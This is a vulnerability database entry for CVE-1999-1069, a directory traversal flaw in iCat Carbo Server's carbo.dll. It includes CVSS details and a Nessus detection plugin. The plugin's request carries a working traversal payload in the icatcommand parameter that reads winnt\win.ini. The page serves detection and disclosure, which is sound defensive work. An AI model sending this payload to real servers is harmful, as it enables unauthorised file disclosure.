Vulnerabilities > CVE-1999-1069 - Unspecified vulnerability in Icat Electronic Commerce Suite 3.0.0

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
network
low complexity
icat
nessus
exploit available

Summary

Directory traversal vulnerability in carbo.dll in iCat Carbo Server 3.0.0 allows remote attackers to read arbitrary files via a .. (dot dot) in the icatcommand parameter.

Vulnerable Configurations

Part Description Count
Application
Icat
1

Exploit-Db

descriptioniCat Electronic Commerce Suite 3.0 File Disclosure Vulnerability. CVE-1999-1069. Remote exploits for multiple platform
idEDB-ID:20513
last seen2016-02-02
modified1997-11-08
published1997-11-08
reporterMikael Johansson
sourcehttps://www.exploit-db.com/download/20513/
titleiCat Electronic Commerce Suite 3.0 File Disclosure Vulnerability

Nessus

NASL familyCGI abuses
NASL idICAT.NASL
descriptionThe installed version of the
last seen2020-06-01
modified2020-06-02
plugin id10112
published1999-06-22
reporterThis script is Copyright (C) 1999-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10112
titleicat carbo.dll icatcommand Parameter Traversal Arbitrary File Access
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

if(description)
{
 script_id(10112);
 script_version ("1.37");

 script_cve_id("CVE-1999-1069");
 script_bugtraq_id(2126);

 script_name(english:"icat carbo.dll icatcommand Parameter Traversal Arbitrary File Access");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server is hosting a CGI application that is affected by
an information disclosure vulnerability." );
 script_set_attribute(attribute:"description", value:
"The installed version of the 'icat' CGI allows a remote user to read
arbitrary files on the remote target, because it fails to properly
sanitize user-supplied input to the 'icatcommand' parameter." );
 script_set_attribute(attribute:"solution", value:
"There is no known solution at this time." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
 script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
 script_set_attribute(attribute:"plugin_publication_date", value: "1999/06/22");
 script_set_attribute(attribute:"vuln_publication_date", value: "1997/11/08");
 script_cvs_date("Date: 2018/06/13 18:56:27");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"cpe", value:"cpe:/a:icat:electronic_commerce_suite");
 script_end_attributes();
 
 script_summary(english:"Determines the presence of the 'icat' cgi");
 
 script_category(ACT_GATHER_INFO);
 
 script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.");
 script_family(english:"CGI abuses");
 script_dependencie("http_version.nasl", "find_service1.nasl", "no404.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80);

foreach dir (cgi_dirs())
{
  res = http_send_recv3(method:"GET", item:string(dir, "/carbo.dll?icatcommand=..\\..\\..\\..\\..\\..\\winnt\\win.ini&catalogname=catalog"), port:port);
  if (isnull(res)) exit(1, "The web server on port "+port+" failed to respond.");

  if ("[fonts]" >< res[2])
    security_warning(port:port);
}